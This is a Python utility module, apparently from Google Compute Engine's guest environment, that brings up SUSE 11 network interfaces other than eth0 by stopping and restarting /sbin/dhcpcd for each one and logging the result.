# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities that are distro specific for use on SUSE 11."""
import os
import subprocess
from google_compute_engine import constants
from google_compute_engine.distro import utils
class Utils(utils.Utils):
"""Utilities used by Linux guest services on SUSE 11."""
def EnableNetworkInterfaces(
self, interfaces, logger, dhclient_script=None):
"""Enable the list of network interfaces.
Args:
interfaces: list of string, the output device names to enable.
logger: logger object, used to write to SysLog and serial port.
dhclient_script: string, the path to a dhclient script used by dhclient.
"""
interfaces_to_up = [i for i in interfaces if i != 'eth0']
if interfaces_to_up:
logger.info('Enabling the Ethernet interfaces %s.', interfaces_to_up)
self._Dhcpcd(interfaces_to_up, logger)
def _Dhcpcd(self, interfaces, logger):
"""Use dhcpcd to activate the interfaces.
Args:
interfaces: list of string, the output device names to enable.
logger: logger object, used to write to SysLog and serial port.
"""
for interface in interfaces:
dhcpcd = ['/sbin/dhcpcd']
try:
subprocess.check_call(dhcpcd + ['-x', interface])
except subprocess.CalledProcessError:
# Dhcpcd not yet running for this device.
logger.info('Dhcpcd not yet running for interface %s.', interface)
try:
subprocess.check_call(dhcpcd + [interface])
except subprocess.CalledProcessError:
# The interface is already active.
logger.warning('Could not activate interface %s.', interface)
| 36.508197 | 78 | 0.715761 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.